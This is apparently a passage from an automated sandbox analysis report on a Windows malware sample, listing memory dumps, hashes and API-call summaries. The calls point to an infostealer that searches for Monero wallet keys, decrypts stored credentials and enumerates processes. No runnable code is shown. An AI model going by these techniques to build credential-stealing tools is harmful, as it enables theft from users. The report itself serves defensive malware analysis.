                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 3f124f26fe645cbe9c44fcf2ce844549499dd538869c2c8b54148e390171be43
                                  • Instruction ID: 1439d9913bba8483f55aa27c63a5f4132ab8478a44d44561e613c15f70c580ee
                                  • Opcode Fuzzy Hash: 3f124f26fe645cbe9c44fcf2ce844549499dd538869c2c8b54148e390171be43
                                  • Instruction Fuzzy Hash: 74413E71950228EBDB24DB54EC99BEDB7B8FF48700F204199E10962291DB782F85CFA5
                                  Function 00AE5940 Relevance: 10.4, Strings: 7, Instructions: 1605COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &O$)ks$/dgO$|;L$2ko$DK@$n_\
                                  • API String ID: 0-2266199521
                                  • Opcode ID: af4ca4038b02d00a615fea422290ea5efc420f3ad439ae00756c166367cfec7e
                                  • Instruction ID: a5a55118842b41423d744cb54d2f47aef736aa21d9db45e0abcc8a8d8e5c658a
                                  • Opcode Fuzzy Hash: af4ca4038b02d00a615fea422290ea5efc420f3ad439ae00756c166367cfec7e
                                  • Instruction Fuzzy Hash: 88B2F3B3A0C6049FE3046E2DEC8567AFBE9EF94720F1A493DE6C4C7344EA3558418796
                                  Function 00AD68B2 Relevance: 10.3, Strings: 7, Instructions: 1579COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *W$I9|W$c?{$rz$yOwv$7c$X'
                                  • API String ID: 0-3388089906
                                  • Opcode ID: f294693cff21f9436f2f029f66ed1ec4e02ad0b78b67f84aaa79b36cb804c943
                                  • Instruction ID: 86db4bebb840908006de2b800b607409c86b756e7a4f8c29a02cfbc5ce4c1eee
                                  • Opcode Fuzzy Hash: f294693cff21f9436f2f029f66ed1ec4e02ad0b78b67f84aaa79b36cb804c943
                                  • Instruction Fuzzy Hash: DBB2E3F3A0C2009FE304AE2DEC8566ABBE5EF94720F1A493DEAC5C7744E63558418797
                                  Function 0071E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00730D73), ref: 0071E4A2
                                  • StrCmpCA.SHLWAPI(?,007314F8), ref: 0071E4F2
                                  • StrCmpCA.SHLWAPI(?,007314FC), ref: 0071E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 7566d80b3fd4a6dadd6720d53b9d069d00e5d6a3cc9650671a7216fe362e5d5d
                                  • Instruction ID: c47c4720c1ea3f80a77cf60d3d34f1e7cc511c4d2a2df5f1663f73a1c95b2dc8
                                  • Opcode Fuzzy Hash: 7566d80b3fd4a6dadd6720d53b9d069d00e5d6a3cc9650671a7216fe362e5d5d
                                  • Instruction Fuzzy Hash: E6123571910128EBDB15FB60EC9AEED7379AF54300F4045A8F50A56192EF386F89CF92
                                  Function 00719AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00714EEE,00000000,?), ref: 00719B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00714EEE,00000000,?), ref: 00719B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: Nq
                                  • API String ID: 4291131564-2915678141
                                  • Opcode ID: 4ea64eedc14a1fa5d4ef0d50b7d16d68a384227e1cdcd61aedd58e42e0d10371
                                  • Instruction ID: a5c85430a2415cd4feb552aead106198700b7a20911e6bd2cf357e81e59ffacc
                                  • Opcode Fuzzy Hash: 4ea64eedc14a1fa5d4ef0d50b7d16d68a384227e1cdcd61aedd58e42e0d10371
                                  • Instruction Fuzzy Hash: C011DFB4240308AFEB10CF64CCA5FAA77B5FB89701F208148FA159B3D0C7B6A941DB94
                                  Function 0071C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0071C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0071C87C
                                  • lstrcat.KERNEL32(?,00730B46), ref: 0071C943
                                  • lstrcat.KERNEL32(?,00730B47), ref: 0071C957
                                  • lstrcat.KERNEL32(?,00730B4E), ref: 0071C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 50cdfd15a62d7ac37d102102bfc80b7215b59e80f4f6c816c443a76124a43de0
                                  • Instruction ID: c7d32622192994e94c79a8edbd0d0091b1d4b04e8aae1b6aaca8c62fc5d03473
                                  • Opcode Fuzzy Hash: 50cdfd15a62d7ac37d102102bfc80b7215b59e80f4f6c816c443a76124a43de0
                                  • Instruction Fuzzy Hash: DF417FB4D1431ADFDB10CF94DD89BFEB7B8BB48304F1042A8E509A6280D7746A84DF95
                                  Function 00726920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 0072696C
                                  • sscanf.NTDLL ref: 00726999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007269B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007269C0
                                  • ExitProcess.KERNEL32 ref: 007269DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 6832049a7639f6f87624687a1742d1281cecf26f5af22c25eafdf022b05b4177
                                  • Instruction ID: a3301526b5b9288135afe96bdf3b7c8cd21970e18e9683ce4ae361bde09e353e
                                  • Opcode Fuzzy Hash: 6832049a7639f6f87624687a1742d1281cecf26f5af22c25eafdf022b05b4177
                                  • Instruction Fuzzy Hash: AA21EE75D14218ABCF04EFE4E9499EEB7B5FF48301F04852EE506E3250EB345605DB69
                                  Function 00717240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0071724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00717281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007172A4
                                  • LocalFree.KERNEL32(?), ref: 007172AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 5b35426151731360e09e190e7beb4ae420b2492b904b8ae026ad7c86ca759bec
                                  • Instruction ID: a98b2f718f4c58b3734129c1fbc514210eceedffce4caf4d17a5a76e7c032e39
                                  • Opcode Fuzzy Hash: 5b35426151731360e09e190e7beb4ae420b2492b904b8ae026ad7c86ca759bec
                                  • Instruction Fuzzy Hash: 87014071A54308BBEB14DBD8CD45F9D77B8BB48701F104154FB05AB2C0D674AA019BA9
                                  Function 00729600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0072961E
                                  • Process32First.KERNEL32(00730ACA,00000128), ref: 00729632
                                  • Process32Next.KERNEL32(00730ACA,00000128), ref: 00729647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0072965C
                                  • CloseHandle.KERNEL32(00730ACA), ref: 0072967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 84682c9b33f07563dc59323a489a3ee43d5c8127ec86d4da32d1b226e4e3eb53
                                  • Instruction ID: 7c12b535d15feffdeabbad8ac22859e2bc063037f48a6ee09ec88d952d0652ce
                                  • Opcode Fuzzy Hash: 84682c9b33f07563dc59323a489a3ee43d5c8127ec86d4da32d1b226e4e3eb53
                                  • Instruction Fuzzy Hash: A3014C75A10318EBCB10DFA5DC48BEDBBF8FB08301F044288AA0996240D7349B40DF55
                                  Function 00AE3E89 Relevance: 6.6, Strings: 4, Instructions: 1637COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %a]?$%a]?$'W/$K-n
                                  • API String ID: 0-49836314
                                  • Opcode ID: a1c436e8d15c16e01856abe61a8b63dcb0d755a2f0ad7e5caf8811303631440e
                                  • Instruction ID: 0658c3b3a03d6f5c51d8e9a90104794285fb0ec28b04b48939983715bb062088
                                  • Opcode Fuzzy Hash: a1c436e8d15c16e01856abe61a8b63dcb0d755a2f0ad7e5caf8811303631440e
                                  • Instruction Fuzzy Hash: 58B219F360C2049FE3046E2DEC8567AFBE9EFD4720F1A453DE6C487744EA3558058696
                                  Function 00AD1819 Relevance: 6.6, Strings: 4, Instructions: 1610COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
